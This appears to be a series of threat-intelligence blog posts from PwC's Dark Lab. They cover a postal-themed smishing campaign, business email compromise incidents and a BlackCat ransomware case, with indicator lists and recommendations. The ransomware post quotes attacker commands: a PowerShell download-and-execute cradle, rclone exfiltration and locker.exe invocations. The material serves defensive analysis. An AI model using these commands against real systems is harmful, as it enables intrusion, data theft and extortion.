23[.]216[.]147[.]64IP Address
20[.]99[.]132[.]105IP Address

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Hong Kong and Singapore Citizens Actively Targeted by Large-Scale Global Smishing Campaign

Posted on by darklabhk

PwC’s Dark Lab uncovers a large-scale smishing campaign actively targeting Hong Kong and Singapore citizens by masquerading as trusted and reputable locally based public and private postal service providers.

On 21 September 2022 , PwC’s Dark Lab observed SMS phishing (smishing) activity targeting mobile users in Hong Kong. The message masqueraded as the postal service Hongkong Post – a government department of Hong Kong responsible for postal services – delivering a package to the victim. We posit that the intended purpose was to steal victims’ personally identifiable information (PII) and credit card details, based on similar information posted on social media.

Smishing campaigns via the fraudulent use postal services are far from uncommon and has increased at an alarming rate as a result of the Covid-19 pandemic. We previous reported on a global campaign impacting Hong Kong, Macau, and Singapore users per our March 2022 blogpost “Smells SMiShy to me…”.[1] This latest campaign caught our attention primarily as it seemed to be an active, large-scale smishing campaign impacting multiple Asia Pacific countries, including Hong Kong and Singapore. We release this blog post concurrent to the ongoing campaign to raise awareness among enterprises and individuals and will continue tracking the threat actor’s activities as the campaign progresses.

Impersonating Hongkong Post

On 21 September 2022, PwC’s Dark Lab observed that Hongkong Post’s Track and Trace portal was being imitated by the newly registered domain hkpoieq[.]com. The domain was no more than one (1) day of age, and requested victims to ‘change their delivery address’ for a fake order “AS658237789HK”. We did not observe the domain to have a mail exchanger (MX) record, which indicated that the threat actor did not intend for this domain to be received via email.

Figure 1: Screenshot of the fraudulent Hongkong Post webpage that was hosted on hkpoieq[.]com

Upon further inspection of the domain, we observed that hkpoieq[.]com resolved to the IP address 155[.]94[.]163[.]222. The threat actor subsequently leveraged the same IP address to register an additional three (3) domains between 22 to 29 September 2022 – hkpoist[.]com, hkpoivt[.]com, and hkpoiec[.]com. The domains seemingly adopted a consistent naming convention whereby the alpha-2 ISO country code[2] was prefixed with an additional five (5) seemingly randomised letter characters. These domains were also registered across a short period of time and proceeded to be unresolvable relatively quickly (under 3 days), thus we were not able to obtain further information beyond the first screenshot to verify the objective of the impersonation. The short time in which the domains remained unresolvable meant that security vendors did not have opportune time to detect the domains and IP address as malicious as of the time of writing[3], which increases the challenge to detect and respond in a timely manner.

However, we were able to retrieve a separate smishing message with a separate domain hkrocit[.]com that also impersonated Hongkong Post on 9 October 2022.

Figure 2: Smishing Message from threat actor to Hongkong Post customer. Translation: “The courier delivery failed to be delivered by the courier without a signature. Please update your address at hkrocit[.]com

Though the naming convention of the domain hkrocit[.]com followed a similar format as hkpoieq[.]com, we could not immediately correlate the two as the second domain resolved to a different IP address 155[.]94[.]140[.]247. Yet upon deeper inspection, we observed that both domains had been registered under the same Internet Service Provider (ISP) QuadraNet Enterprises LLC (QuadraNet) with an Autonomous System Number (ASN) 8100. Furthermore, the threat actor continued the same pattern of operations by registering new domains, though with greater frequency amounting to a total of 12 domains over 14 days (details in the Indicator of Compromise section). As of the time of writing, we have not observed further domains resolving to this IP address since they were flagged malicious on 14 October 2022.[4]

Given both a similar naming convention, a similar ASN and ISP, as well as the similar pattern of newly registered domains impersonating the same service provider, we assess with moderate confidence that it is the same threat actor conducting a persistent smishing campaign targeting Hong Kong citizens.

During our pivoting, we also observed that there were three (3) domains registered between 29 September 2022 and 10 October 2022 that began with “sg” and resolved to 155[.]94[.]140[.]247. We extended our logic that the domain’s first two letters were the alpha-2 ISO country code, and through open-source investigation was able to observe that sgpoist[.]com had previously impersonated Singapore Post Limited (SingPost), which is the designated public postal licensee for Singapore. This gave weight to our hypothesis on the domain naming convention and increased our confidence level that it is a campaign that extends targeting beyond Hong Kong and to other countries such as Singapore.

Figure 3: Observing from records of previously conducted public searches on sgpoist[.]com to validate our hypotheses on the domain naming convention and identifying that the threat actor also impersonated Singapore Post Limited

The Final Confirmation…

The final confirmation that the threat actor has previously targeted other Asia Pacific countries such as Japan with an objective of steal victims’ PII and credit card details was obtained through various posts on the social media platform Twitter. A simple search on 155[.]94[.]140[.]247 revealed that security researchers previously alerted the public in April 2022 of phishing campaigns impersonating reputable retailers such as AEON[5] and Amazon Japan[6], highlighting QuadraNet as the questionable ISP.

Figure 4: Twitter posts that flag 155[.]94[.]140[.]247 as suspicious in April 2022 given impersonation of AEON and Amazon Japan

Similarly, on 23 September 2022, local news station Channel C HK reported on a similar case whereby four (4) teenagers were detained by Hong Kong Police Force for using stolen credit cards to purchase electronic devices. Their investigation found that the group allegedly obtained the stolen credentials by operating a fake Hongkong Post website and linking a mobile payment tool to the site to make purchases with the stolen credit card information.[7] While there is insufficient information to draw a correlation between both cases, this incident provides further insight into the likely motivations and intended impact of the threat actors behind QuadraNet. This is the final validation to strengthen our assessment that this is a large-scale phishing campaign likely initiated by cybercriminals that sought to gain profit via sale of PII and credit card information.

Target Shifted: Observing the Threat Actor Impersonating S.F. Express

As of the time of writing, we observed that the campaign is likely ongoing though the behaviors of the threat actor has slightly changed. For example, S.F. Express is now the organisation being impersonated, with domains such as hkrzit[.]com, hkrmit[.]com, and hkrlit[.]com being registered between 13 and 14 October 2022. The naming convention has also altered slightly, with the alpha-2 ISO country code now only prefixed with an additional four (4) seemingly randomised letter characters instead of the original five (5) letter characters. We posit that the threat actor will continue to conduct smishing to obtain PII and credit card information from unsuspecting victims, likely those based in Hong Kong.

Figure 5: Screenshot of the fraudulent S.F. Express webpage that was hosted on hkrzit[.]com

Conclusion – To Be Continued…

PwC’s Dark Lab observes that Hong Kong and Singapore are actively being targeted by a global large-scale persistent smishing campaign. We strongly encourage citizens to practice caution and awareness when interacting with communications, particularly of SMS origin as a result of the recent campaign. PwC’s Dark Lab will continue to monitor campaigns of varying scales, not just those that may target enterprises but also those that impact individuals. We will continue to investigate this ongoing campaign and invite readers to stay tuned for further updates and insights.

Recommendations for Individuals

  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt.
  • If you accidentally visit a phishing site, do not click on any links and check if any files were downloaded. Monitor your email’s ‘sent’ folder to identify if any unauthorized emails have been issued from your account. Alert the receiver, as well as your wider contact list that you may have fallen victim to a phishing attack so they can be on alert that incoming messages from your account may not be legitimate.
  • If you believe you have fallen victim to a phishing attack, we recommend that you perform a password reset, enable MFA, and report the suspected phishing activity immediately to your credit card issuers (and organisation if accessed the site through your work device) to monitor and restrict potentially suspicious activity.

Recommendations for Organisations

  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action – this is typically conducted by your Security Operations Centre. For this particular case, we suggest to look for domains that have four (4) or five (5) randomised letter characters appended to alpha-2 ISO country codes for the countries they operate in. We have already informed Hongkong Post and S.F. Express to investigate, and if necessary perform takedown of fake domains.
  • Organisations should enforce a layered defense strategy, incorporating both defensive and preventative protocols. This includes enforcing a zero trust network and organisation-wide.
  • Organisations should update their email security solution and network devices (including external firewall, web proxies) to detect for potential inbound/outbound connections from the known-bad domains and IP addresses in this post.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning domains impersonating legitimate brands and conduct regular review activities of those domains to ensure their use for ethical and non-malicious activities. 
  • Read our blog about Business Email Compromise (BEC) to learn more about targeting against organisations and the recommendations of how to prevent, detect and respond to a BEC attack.[8]

Indicators of Compromise (IoCs)

IoCType
155[.]94[.]140[.]247 IP Address
155[.]94[.]163[.]222IP Address
hkpoivt[.]comMalicious Domain
xiewen[.]xyzMalicious Domain
hkpoiec[.]comMalicious Domain
hkpoieq[.]comMalicious Domain
hkpocn[.]comMalicious Domain
hkpoir[.]comMalicious Domain
hkpoie[.]comMalicious Domain
hkpoet[.]comMalicious Domain
hkpoik[.]comMalicious Domain
hkpoim[.]comMalicious Domain
hkpois[.]comMalicious Domain
hkpoei[.]comMalicious Domain
hkrmit[.]comMalicious Domain
hkrzit[.]comMalicious Domain
hkrlit[.]comMalicious Domain
hkrxit[.]comMalicious Domain
hkrcit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkromit[.]comMalicious Domain
hkroist[.]comMalicious Domain
hkpoist[.]comMalicious Domain
hkporut[.]comMalicious Domain
linkblti[.]comMalicious Domain
hkrqit[.]comMalicious Domain
hkrwit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkrzit[.]comMalicious Domain
hkrlit[.]comMalicious Domain
cadpoxit[.]comMalicious Domain
hkrxit[.]comMalicious Domain
cadpocit[.]comMalicious Domain
hkrcit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkromit[.]comMalicious Domain
hkroist[.]comMalicious Domain
sgpardrt[.]comMalicious Domain
hkpoist[.]comMalicious Domain
hkporut[.]comMalicious Domain
sgporut[.]comMalicious Domain
sgpoist[.]comMalicious Domain
cadporv[.]comMalicious Domain
cadporc[.]comMalicious Domain
mazsn[.]comMalicious Domain
anazch[.]comMalicious Domain
anazc[.]comMalicious Domain
anazcm[.]comMalicious Domain
aeomn[.]comMalicious Domain
anazsm[.]comMalicious Domain
singpirt[.]comMalicious Domain
hkpoivt[.]comMalicious Domain
hkpoiat[.]comMalicious Domain
hkpoiec[.]comMalicious Domain
hkpoieq[.]comMalicious Domain
foodpre[.]comMalicious Domain
likntbl[.]comMalicious Domain
gobmxp[.]comMalicious Domain
xwssr[.]xiewen[.]xyzMalicious Domain
ssr[.]xiewen[.]xyzMalicious Domain
xiewen[.]xyzMalicious Domain
cloud[.]thexw[.]cnMalicious Domain
ssr[.]thexw[.]cnMalicious Domain

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Phishing for Profit: Business Email Compromises

Posted on by darklabhk

There are plenty of phish in the sea and they’re back with new tricks! Dark Lab responds to multiple business email compromise campaigns targeting Hong Kong. We outline two recent incidents, sharing the Tactics, Techniques, and Procedures (TTPs) observed, and recommendations on how to prevent, detect, and respond to a phishing attack.

Business email compromise (BEC) is a social engineering attack which broadly refers to a malicious threat actor attempting to defraud organisations by hacking into their email accounts and impersonating employees and third parties. These phishing attacks have existed for many years, though remain prevalent due to their ability to continuously illicit emotional reactions of victims, thereby triggering an unintended response such as performing actions that lead to undesirable consequences. This is further exacerbated by the fact that BEC attacks typically yield a high return on investment given the low cost of setup and ability to scale operations globally.

The impact of BEC attacks are most evident in the amount of reported losses. The Federal Bureau of Investigation (FBI) reported that BEC attacks amounted to a staggering US$43 billion financial loss globally between 2016 to 2021.[1] Meanwhile, the Hong Kong Computer Emergency Response Team Coordination Centre (HKCERT) reportedly handled 3,737 phishing incidents in 2021, which represented almost half of the total reportedly handled incidents and was up 7 percent from 2020, rising for the fourth consecutive year.[2]

PwC’s Dark Lab also responded to an increased number of BEC campaigns in 2022. Two particular incidents stood out for their automated “spray and pray” approach to achieve initial access, followed by performing calculated and stealthy manual actions to persist in the Microsoft 365 environment to facilitate ongoing reconnaissance with the aim of effectively impersonating their victim to convince other staff members to approve fund transfers to the threat actor’s bank account. We elaborate the tactics, techniques and procedures (TTPs) that these threat actors leveraged and provide our recommendations on how to prevent, detect, and respond to BEC attacks should they befall your organisation. We further examine the rising trend of phishing kits in large scale phishing operations, enabling low-skilled threat actors to develop compelling phishing campaigns and bypass multi-factor authentication.

Case Study: Global Campaign by Opportunistic Cybercriminal of Unknown Origin

PwC’s Dark Lab responded to an incident in 2Q 2022 that involved a local property investment, management, and development company. The victim’s Microsoft Office 365 account was compromised via a phishing email from the sender domain macopas[.]com, with a link re-directing the victim to a fake Outlook login portal developed and hosted by the threat actor. To convince the victim to provide their password, the Outlook page pre-populated their email address. Given the victim’s mailbox did not have multi-factor authentication (MFA) enabled, the threat actor could obtain full access to the mailbox with a valid password.

The threat actor proceeded to perform three (3) manual actions to persist in the environment and gain more insights on the business operations while remaining hidden. First, the threat actor created various mail rules for moving and/or deleting emails with keywords associated with the threat actor’s access activities. Second, the malicious billing email was sent directly from the victim’s mailbox to various internal staff. Third, a malicious Azure enterprise application named “Newsletter Software SuperMailer” was created by the victim’s account for persisted access; this was particularly useful as the threat actor successfully performed re-logon to the compromised account even after the password was updated. The threat actor was only denied re-entry after MFA for the victim’s mailbox was enforced.

Through review of the available logs, we were able to observe through email trace that the attacker-controlled IP address delivered the same phishing emails to over three hundred (300) addresses of the victim organisation in alphabetical order. Meanwhile, we discovered through open-source information that similar emails had been sent to at least twenty (20) additional organisations globally. Combined with the fact that the threat actor was observed to only perform the first login two days after the password was inputted suggested they spent time to retrieve, study, and utilise their haul of phished credentials. These indicators and behaviour are more reflective of an opportunistic “spray and pray” campaign given the lack of urgency to quickly establish persistence. This is also evident in the end-to-end incident period lasting just under ten (10) days.

Case Study: Nigerian Cybercriminals Exploit Trusted Relationships with Hong Kong Branch Employee to Commit Cyber Fraud

PwC’s Dark Lab responded to a second BEC incident in 3Q 2022 involving a Chinese e-payment terminal solutions service provider with global operations. Similar to the case above, MFA was not enabled, and the threat actor was observed to host phishing domains imitating the Outlook login portal, enabling the threat actor to obtain initial access with valid credentials. This case left a lasting impression for three reasons.

First, the threat actor spent up to three (3) weeks familiarising themselves with ongoing operations by logging in remotely from multiple geolocations (including United States, Australia, Germany, and Nigeria) and modifying various mail rules and contact lists before executing their attack. The inbox rules hide emails specific to the transaction being targeted (e.g. emails from the legitimate parties, emails with transaction references numbers or bank accounts in the body). The emails are moved to a lesser viewed “RSS Feeds” folder with “Mark as Read” enabled in attempt to hide legitimate emails from the victim’s sight.

Second, the threat actor registered a new domain to impersonate the victim in Hong Kong to send emails to European counterparts . Notably, the threat actor embedded their phishing emails within existing conversations – an evasive tactic to exhibit legitimacy by using conversations with established trust. One of the seven (7) phishing emails contained a malicious link (secure[.]membra[.]co[.]uk) that appeared “clean” as it had not been reported as suspicious. However, through deeper inspection we observed the underlying IP address (45[.]153[.]240[.]153) was reported to be malicious, previously associated with other subdomains mimicking as the Microsoft O365 login page, likely used for global phishing campaigns.

Associated domains – likely past phishing campaigns
login-mso[.]cscsteelsusa[.]com
ogin-mso[.]cscsteelsusa[.]com
wwwoffice[.]cscsteelsusa[.]com
login[.]cscsteelsusa[.]com
Live Screenshot (as of 6/10/22) of login-mso[.]cscsteelsusa.com

Third, the threat actor practiced poor operational security including the inconsistent use of a virtual private network (VPN); as a result, they may have potentially disclosed that they operate out of Nigeria. While none of the Nigerian IP addresses were reported as malicious across various open-source security tools, Nigeria has been widely reported by security researchers to be a hotspot for cybercrime activity related to business email compromise attacks.[1] Overall, based on the investigation on open-source platforms leveraging the indicators of compromise from the incident, we conclude with high confidence that the incident was part of a larger-scale mass phishing campaign that opportunistic cybercriminals – likely out of Nigeria – conducted without the intention to target a specific sector or country, and with the motivation of transferring illicit funds to fraudulent bank accounts for financial gain.

Nigerian IP addresses
41[.]184[.]152[.]104
41[.]217[.]70[.]163
154[.]118[.]65[.]105

Phishing Kits bypass MFA

PwC’s Dark Lab observe the prevalent development of phishing kits (also known as adversary-in-the-middle (AiTM)), with over 10,000 organisations targeted by phishing kit attacks since September 2021. AiTMs provide a phishing toolkit as a service for attackers with low technical skills to execute a convincing phishing attack. AiTM phishing kits are easily accessible for attackers on the dark web with various open-source phishing kits available, including prominent providers Evilginx2[4], Modlishka[5], and Muarena[6].

AiTM phishing sites exercise a strong capability, as they enable attackers to deploy a proxy server between a target user and the website the user is attempting to visit – intercepting the connection by redirecting to the attacker’s phishing site. By targeting the authentication token, rather than raw credentials and/or MFA tokens, the phishing kit enables the attacker to steal a fully authenticated session from the victim, effectively bypassing MFA.[7]

As the trend of MFA enforcement by organisations and individuals continue to rise, it is expected that phishing campaigns will move away from traditional phishing methods towards the use of AiTM to overcome the barrier that MFA presents. As threat actors evolve to find innovative ways to circumvent controls and lower the barriers to entry, it becomes even more important for defenders to keep pace with these trends and understand how to prevent, detect, respond, and recover from such attacks.

Conclusion

As evidenced in both case studies, threat actors orchestrating large scale phishing campaigns pose a significant challenge for targeted victims. This can be observed in the actors’ willingness to wait up to three (3) to four (4) weeks before taking action, using the buffer period to build a strong understanding of the victim’s processes to effectively imitate their victim and evade suspicion.

In both cases, we observed oversights in the victim organisations’ security stance which ultimately resulted in their exposure to a BEC attack. In both cases, if multi-factor authentication (MFA) had been enabled, this could have prevented the threat actor from gaining access. Similarly, had the second victim organisation established rules to detect abnormal logins, such as flagging an IP address for suspicious activity if observed to have multiple geolocations over the span of a week, the organisation could have detected the suspicious activity at an earlier stage and prevented further action.

To effectively protect against phishing and BEC attacks, it is vital that organisations enforce a layered defense strategy – combining robust preventative measures with intuitive detective protocols.

Recommendations

While phishing legitimate brands and business email compromises will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Enhance security controls by establishing procedures in defining “significant” financial transactions and their respective handling procedures, for example automatic bank notifications for outbound transaction verifications and mandatory out-of-band verifications of bank account changes.
  • Develop and exercise a layered defense strategy, incorporating well-defined preventative and detective measures.
  • Organisations should review their Microsoft 365 configuration and update their email security solutions and network devices (including external firewall, web proxies).
  • Implement conditional access rules configuring with Geo-location/IP address restriction to reduce the risk of unauthorised overseas access to O365. For example, a regular review of authentication records for key financial staff members (i.e. Chief Financial Officer, Financial Controller, etc.)
  • Organisations should establish rules to restrict unauthorised devices from accessing company resources. For example, enforcing limitations on what devices can access company resources and creating onboarding procedures to enrol authorised devices, such as an employee’s personal mobile phone, before they are able to access company resources.
  • Enforce strong multi-factor authentication (MFA), such as number matching, for all users.
  • To protect against AiTM attacks, it is advised that organisation implement a layered defense strategy that incorporates MFA in conjunction with various preventative and defensive measures. This includes implementing MFA that supports Fast ID Online (FIDO) v2.0 and certificate-based authentication, enabling conditional access policies, and continuous monitoring for abnormal activities.
  • Implement periodic checking process to detect suspicious behaviour such as abnormal logins, mailbox rules, email forwarding rules, and application consent activities.
  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action (e.g., domain takedown). This task is typically conducted by our Security Operations Centre for subscription clients, and supported by our Cyber Threat Operations function which includes the Threat Intelligence and Incident Response pillars.
  • Conduct regular awareness training to educate the workforce on how to detect suspicious activity, highlighting new TTPs and clear warning signs, and provide clear instructions on the steps to take if they believe they have been targeted by a phishing email. Awareness training can also be completed in the form of phishing simulations to test employees’ susceptibility to phishing emails and fraud (i.e. simulate a sudden change of bank account information to determine if the relevant team detects the unusual behaviour and responds accordingly).
  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt. BEC-impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected .
  • We further advise organisations to establish a O365 mailbox rule to detect inbound/outbound traffic from the malicious IP listed in our Indicators of Compromise (IoC) section.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Acquire Infrastructure: Domains – T1583.001
  • Virtual Private Server – T1583.003
  • Botnet – T1583.005
  • Compromise Email Accounts – T1586.002
  • Phishing – T1566
  • Spear Phishing Link – T1566.001
  • Trusted Relationship – T1199
  • Email Hiding Rules – T1564.008
  • SharePoint – T1213.002
  • Remote Email Collection – T1114.002

Indicators of Compromise (IoCs)

IndicatorType
www[.]yinqsite[.]comKnown bad domains
login-microsoftonnex-mso[.]yinqsite[.]comKnown bad domains
yinqsite[.]comKnown bad domains
ogin-mso[.]wonjiinco[.]coKnown bad domains
glprop-okta-2f0bc4a0[.]wonjiinco[.]comKnown bad domains
stscn-lenovo-c9b8a5aa[.]wonjiinco[.]comKnown bad domains
msaauth-msasafety-95cce817[.]wonjiinco[.]comKnown bad domains
sts-glb-nokia-a6db40b3[.]wonjiinco[.]comKnown bad domains
sts-posteitaliane-694c6373[.]wonjiinco[.]comKnown bad domains
gas-mcd-37816100[.]wonjiinco[.]comKnown bad domains
login-mso[.]wonjiinco[.]comKnown bad domains
wonjiinco[.]comKnown bad domains
ogin-mso[.]cscsteelsusa[.]comKnown bad domains
wwwoffice[.]cscsteelsusa[.]comKnown bad domains
login[.]cscsteelsusa[.]comKnown bad domains
sts01-nestle-382a43f3[.]cscsteelsusa[.]comKnown bad domains
stscn-lenovo-a3ae4e78[.]cscsteelsusa[.]comKnown bad domains
fs-ncoc-a241b101[.]cscsteelsusa[.]comKnown bad domains
login-mso[.]cscsteelsusa[.]comKnown bad domains
www[.]cscsteelsusa[.]comKnown bad domains
kolroff[.]comKnown bad domains
xsbrane[.]comKnown bad domains
cscsteelsusa[.]comKnown bad domains
belasting-betalen[.]financeKnown bad domains
domain macopas[.]comKnown bad domains
95[.]216[.]126[.]229IP address
15.204.25.141IP address
Newsletter Software SuperMailerEnterprise application created by threat actor
45[.]153[.]240[.]153IP address
185[.]54[.]228[.]88IP address
185[.]202[.]175[.]6IP address
103.231[.]89[.]230IP address
41[.]184[.]152[.]104IP address
155[.]94[.]141[.]30IP address

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

The Black Cat’s Out of the Bag

Posted on by darklabhk

Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.

In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), were likely behind the incident.

Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the unconventional programming language RUST, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including DarkSide/BlackMatter and Lockbit 2.0 RaaS programmes.[1] The financially motivated cybercriminal groups’ targets are selected opportunistically rather than with an intent to target specific sectors or geographies but have been observed from their leak site as of 31 August 2022 to have successfully targeted 136 organisations across the United States, Europe, and the Asia Pacific region.

BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.

Analysis and Exploitation in the wild

Initial Access

Based on the available audit logs, the threat actor likely leveraged a critical remote code execution vulnerability CVE-2019-0708 or BlueKeep in Remote Desktop Services – formerly known as Terminal Services – that affects selected older versions of Windows.[2] To exploit this vulnerability, an unauthenticated attacker would need to send a specially crafted request to the target systems Remote Desktop Service via Remote Desktop Protocol (RDP). An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system, including installing programs; view, change, or delete data; or create new accounts with full user rights.[3] It should be noted that the RDP service itself is not vulnerable.

It was observed over the first three (3) days that the three of five (3 of 5) potentially malicious IP addresses to gain access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart, and per various public sources have been flagged as potentially malicious dating back to December 2021.[4] The time spent in the environment was observed to be minimal and no more than a couple of hours combined, with specific execution of the Advanced Port Scanner and Mimikatz observed in the second session. More details will be elaborated in the next section.

Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address to the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.

While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.

Suspected Threat Actor Country Reported MaliciousReported Malicious on OSINT PlatformsDays of AccessReported Malicious on OSINT Platforms
Initial Access BrokerBelizeYesApril 2022Day 15 mins
Initial Access BrokerRussiaYesJune 2022Day 21 hour
BlackCat AffiliateRussiaNoDay 3 7 hours
BlackCat AffiliateUSANoDay 109 hours
BlackCat AffiliateUSANoDay 102 days 4 hours

Through investigation into the user account compromised, we determined that the victim’s device was unknowingly exposed to the Internet due to a multi-homing issue, whereby their device was connected to both the corporate network as well as a standalone network with an external firewall and network configurations and that exposed the device to the Internet. It was further observed that the workstation had not been updated for multiple years, leaving the device unpatched and vulnerable to exploitation.

CVE(s)CVE-2019-0708
First Published Date26 November 2018
CVSS v39.8
Affected VersionsWindows 7, Windows Server 2008 R2, Windows Server 2008 and earlier.
DescriptionA remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability.[5]
Potential ImpactRemote Code Execution Vulnerability enables threat actors to gain initial access and execute the malicious code.
Proof of Concept (PoC) AvailableYes[6]
Exploited in the WildYes[7]
Patch AvailableYes. Update to Windows Server 2012 or above.
We highly recommend installing the latest Windows version for patches against additional unrelated vulnerabilities.
Workaround AvailableMicrosoft[8] has provided potential workarounds:
• Disable Remote Desktop Services if they are not required.
• Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions.
• Block TCP port 3389 at the enterprise perimeter firewall.

Credential Access and Discovery by Suspected Initial Access Broker

We observed the threat actor deployed Advanced Port Scanner[9] to scan the network for open ports on network computers to identify weakened pathways.

The threat actor proceeded to execute Mimikatz[10] to dump the Local Security Authority Server Service (LSASS) process memory and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.

Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control

It was observed that the threat actor executed a PowerShell command, Cobalt Strike BEACON (beacon.exe) [11] to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 enabled remote access to the environment without RDP, as well as further infiltration by leveraging various features provided by the implant.

The threat actor established a connection to a Cobalt Strike Beacon hosted on a public cloud server, potentially to collect their various toolkits by executing this command: powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a’). Subsequently, the threat actor deployed AdFind.exe [12] to perform active directory reconnaissance, enabling them to retrieve a list of accounts within the network.

BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter downloading and executing malicious payloads.[13] The fact that the threat actor did this only from the fourth and fifth IP instead of the first three IP addresses lends more credence to the hypothesis that we make that the first set of IP addresses were initial access broker.

Lateral Movement

Through their enumeration of the victim’s environment, the threat actor was able to identify their critical systems ideal for targeting, including the domain controller server, back-up servers, and the anti-virus management server. It was observed by the threat actor that the anti-virus management server had no Endpoint Detection and Response (EDR) installed. Selective targeting of critical systems with no EDR coverage is a common practice among sophisticated threat actors as they present an ideal environment for attackers to arbitrate their attack while stealthily evading detection.

Subsequent to identifying the critical systems, the threat actor leveraged the stolen domain administrator account to initiate a remote desktop (RDP) connection. This enabled the threat actor to laterally move from the compromised multihoming workstation to the targeted endpoints due to the flat network environment, as a result of basic or lack of network segmentation in place.

Defense Evasion

It was observed that the threat actor exercised various acts of defense evasion through the use of masquerading tools and lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tools an evasive manoeuvre often used by BlackCat affiliates to hide their malicious tools and make the process appear as if it is the original Windows svchost process.[14]

Exfiltration

The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process whilst deploying rclone.exe[15] to exfiltrate the data to their cloud storage hosted on MEGACloud. Notably, while the New Zealand cloud service, MEGACloud, is a legitimate and trusted platform, it is also a popular service for hackers due to the platform’s unique payment feature allowing users to pay by Bitcoin.[16]

It has been reported by security researchers that BlackCat affiliates leverage rclone.exe to collect and exfiltrate extensive amounts of data from their victim’s network.[17] The threat actor executed the following command to exfiltrate data from the target network: ProgramData\rclone.exe

Impact

The threat actor exercised encryption of the exfiltrated data and executed locker.exe on various endpoints with the following commands:

  • C:\Windows\locker.exe" --child --access-token --verbose
  • C:\Windows\locker.exe" --access-token -v --no-prop-servers \ –propagated

The commands activate the BlackCat payload. Command 2 provides an indicator (“no-props-servers”) that the malware has the capability to self-propagate, but the threat actor strategically targeted critical servers for propagation, omitting servers likely to detect their movements.

It is worth noting that self-propagation is not a common feature of ransomwares. Ultimately, the goal of threat actors is to gain a foothold on a network as quick as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time in the resource development phase to enumerate the network and select their targets, as well as a manual deployment of the attack. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly – establishing their foothold whilst evading detection.

Conclusion

BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns, opportunistic in nature. With a sophisticated toolkit, various evasion tactics including the RUST-written malware and self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates as a result of our recent incident response experience to improve their preventative and detective controls.

Recommendations

As mentioned in the previous blog posts, defending against human-operated ransomware incidents are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Perform malicious account and group policy creation to identify unauthorized changes and misconfigurations in your organisation’s network environment
  • Regularly perform a review for network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.

In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed. 

